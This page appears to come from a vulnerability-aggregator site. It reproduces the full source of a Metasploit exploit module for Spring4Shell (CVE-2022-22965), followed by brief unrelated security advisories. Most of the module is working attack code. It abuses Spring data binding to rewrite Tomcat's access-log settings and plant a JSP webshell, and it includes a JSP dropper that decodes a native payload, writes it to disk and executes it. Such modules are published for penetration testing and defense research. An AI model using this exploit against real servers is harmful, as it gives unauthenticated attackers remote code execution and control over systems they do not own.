Headline
Spring4Shell Spring Framework Class Property Remote Code Execution
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # It's going to manipulate the Class Loader prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'Spring Framework Class property RCE (Spring4Shell)', 'Description' => %q{ Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution. }, 'Author' => [ 'vleminator <vleminator[at]gmail.com>' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-22965'], ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'], ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'], ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965'] ], 'Platform' => %w[linux win], 'Payload' => { 'Space' => 5000, 'DisableNops' => true }, 'Targets' => [ [ 'Java', { 'Arch' => ARCH_JAVA, 'Platform' => %w[linux win] }, ], [ 'Linux', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'linux' } ], [ 'Windows', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win' } ] ], 'DisclosureDate' => '2022-03-31', 'DefaultTarget' => 0, 'Notes' => { 'AKA' => ['Spring4Shell', 'SpringShell'], 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']), OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']), OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]), ] ) register_advanced_options [ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def jsp_dropper(file, exe) # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9. dropper = <<~EOS <%@ page import=\"java.io.FileOutputStream\" %> <%@ page import=\"java.util.Base64\" %> <%@ page import=\"java.io.File\" %> <% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\")); oFile.flush(); oFile.close(); File f = new File(\"#{file}\"); f.setExecutable(true); Runtime.getRuntime().exec(\"#{file}\"); %> EOS dropper end def modify_class_loader(method, opts) cl_prefix = 'class.module.classLoader' send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'version' => '1.1', 'method' => method, 'headers' => { 'c1' => '<%', # %{c1}i replacement in payload 'c2' => '%>' # %{c2}i replacement in payload }, "vars_#{method == 'GET' ? 'get' : 'post'}" => { "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload], "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory], "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix], "#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix], "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format] } }) end def check_log_file print_status("#{peer} - Waiting for the server to flush the logfile") print_status("#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}") succeeded = retry_until_true(timeout: 60) do res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(@jsp_file) }) res&.code == 200 && !res.body.blank? end fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded print_good("#{peer} - Log file flushed") end # Fix the JSP payload to make it valid once is dropped # to the log file def fix(jsp) output = '' jsp.each_line do |l| if l =~ /<%.*%>/ output << l elsif l =~ /<%/ next elsif l =~ /%>/ next elsif l.chomp.empty? next else output << "<% #{l.chomp} %>" end end output end def create_jsp jsp = <<~EOS <% File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}"); jsp.delete(); %> #{Faker::Internet.uuid} EOS if target['Arch'] == ARCH_JAVA jsp << fix(payload.encoded) else payload_exe = generate_payload_exe payload_filename = rand_text_alphanumeric(rand(4..7)) if target['Platform'] == 'win' payload_path = datastore['WritableDir'] + '\\' + payload_filename else payload_path = datastore['WritableDir'] + '/' + payload_filename end jsp << jsp_dropper(payload_path, payload_exe) register_files_for_cleanup(payload_path) end jsp end def check @checkcode = _check end def _check res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6)) ) return CheckCode::Unknown('Web server seems unresponsive') unless res if res.headers.key?('Server') res.headers['Server'].match(%r{(.*)/([\d|.]+)$}) else res.body.match(%r{Apache\s(.*)/([\d|.]+)}) end server = Regexp.last_match(1) || nil version = Rex::Version.new(Regexp.last_match(2)) || nil return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/) vprint_status("Detected #{server} #{version} running") if datastore['HTTP_METHOD'] == 'Automatic' # prefer POST over get to keep the vars out of the query string if possible methods = %w[POST GET] else methods = [ datastore['HTTP_METHOD'] ] end methods.each do |method| vars = "vars_#{method == 'GET' ? 'get' : 'post'}" res = send_request_cgi( 'method' => method, 'uri' => normalize_uri(datastore['TARGETURI']), vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) } ) # setting the default assertion status to a valid status send_request_cgi( 'method' => method, 'uri' => normalize_uri(datastore['TARGETURI']), vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' } ) return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400 end Exploit::CheckCode::Safe end def exploit prefix_jsp = rand_text_alphanumeric(rand(3..5)) date_format = rand_text_numeric(rand(1..4)) @jsp_file = prefix_jsp + date_format + '.jsp' http_method = datastore['HTTP_METHOD'] if http_method == 'Automatic' # if the check was skipped but we need to automatically identify the method, we have to run it here @checkcode = check if @checkcode.nil? http_method = @checkcode.details[:method] fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank? print_good("Automatically identified HTTP method: #{http_method}") end # if the check method ran automatically, add a short delay before continuing with exploitation sleep(5) if @checkcode # Prepare the JSP print_status("#{peer} - Generating JSP...") # rubocop:disable Style/FormatStringToken jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i') # rubocop:enable Style/FormatStringToken # Modify the Class Loader print_status("#{peer} - Modifying Class Loader...") properties = { payload: jsp, directory: datastore['PAYLOAD_PATH'], prefix: prefix_jsp, suffix: '.jsp', file_date_format: date_format } res = modify_class_loader(http_method, properties) unless res fail_with(Failure::TimeoutExpired, "#{peer} - No answer") end # No matter what happened, try to 'restore' the Class Loader properties = { payload: '', directory: '', prefix: '', suffix: '', file_date_format: '' } modify_class_loader(http_method, properties) check_log_file handler end # Retry the block until it returns a truthy value. Each iteration attempt will # be performed with expoential backoff. If the timeout period surpasses, false is returned. def retry_until_true(timeout:) start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) ending_time = start_time + timeout retry_count = 0 while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time result = yield return result if result retry_count += 1 remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) break if remaining_time_budget <= 0 delay = 2**retry_count if delay >= remaining_time_budget delay = remaining_time_budget vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}") else vprint_status("Sleeping for #{delay} seconds before attempting again") end sleep delay end false endendRelated news
Ivanti Avalanche Incorrect Default Permissions allows Local Privilege Escalation Vulnerability
An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
This vulnerability allows remote attackers to bypass authentication on affected installations of Ivanti Avalanche 6.3.2.3490. The specific flaw exists within the ProfileDaoImpl class. A crafted request can trigger execution of SQL queries composed from a user-supplied string. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-15332.
Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).
Categories: Exploits and vulnerabilities Categories: News Tags: wormable Tags: zero-day Tags: spring4shell Tags: cve-2022-34718 Tags: log4j Tags: openssl Tags: cve-2022-36934 Tags: cve-2022-27492 Tags: cve-2022-22965 Tags: cve-2022-22963 What does it take to make the discussion of vulnerabilities useful? And where did this go wrong in 2022? (Read more...) The post 4 over-hyped security vulnerabilities of 2022 appeared first on Malwarebytes Labs.
Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.
TERASOLUNA Global Framework 1.0.0 (Public review version) and TERASOLUNA Server Framework for Java (Rich) 2.0.0.2 to 2.0.5.1 are vulnerable to a ClassLoader manipulation vulnerability due to using the old version of Spring Framework which contains the vulnerability.The vulnerability is caused by an improper input validation issue in the binding mechanism of Spring MVC. By the application processing a specially crafted file, arbitrary code may be executed with the privileges of the application.
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.
Trustwave report also finds 2022 is set to surpass 2021 for volume of critical CVEs
PrinterLogic Windows Client through 25.0.0.676 allows attackers to execute directory traversal. Authenticated users with prior knowledge of the driver filename could exploit this to escalate privileges or distribute malicious content.
A threat actor is said to have "highly likely" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector. The attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch
Plus: A Google Chrome patch licks the DevilsTongue spyware, Android’s kernel gets a tune-up, and Microsoft fixes 84 flaws.
Vulnerability in the Oracle Banking Trade Finance product of Oracle Financial Services Applications (component: Infrastructure). The supported version that is affected is 14.5. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Trade Finance. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Banking Trade Finance accessible data as well as unauthorized access to critical data or complete access to all Oracle Banking Trade Finance accessible data. CVSS 3.1 Base Score 6.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N).
Red Hat Security Advisory 2022-4880-01 - Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes bug fixes and feature improvements. Issues addressed include a bypass vulnerability.
Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes bug fixes and feature improvements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-23820: json-pointer: type confusion vulnerability can lead to a bypass of CVE-2020-7709 when the pointer components are arrays * CVE-2021-41190: opencontainers: OCI manifest and index parsing confusion
Multiple Denial-of-Service vulnerabilities was discovered in the F-Secure Atlant and in certain WithSecure products while scanning fuzzed PE32-bit files cause memory corruption and heap buffer overflow which eventually can crash the scanning engine. The exploit can be triggered remotely by an attacker.
Ruijie Reyee mesh routers with ReyeeOS version 1.55.1915 EW_3.0(1)B11P35 and EW_3.0(1)B11P55 suffer from a remote code execution vulnerability.
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path.
Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.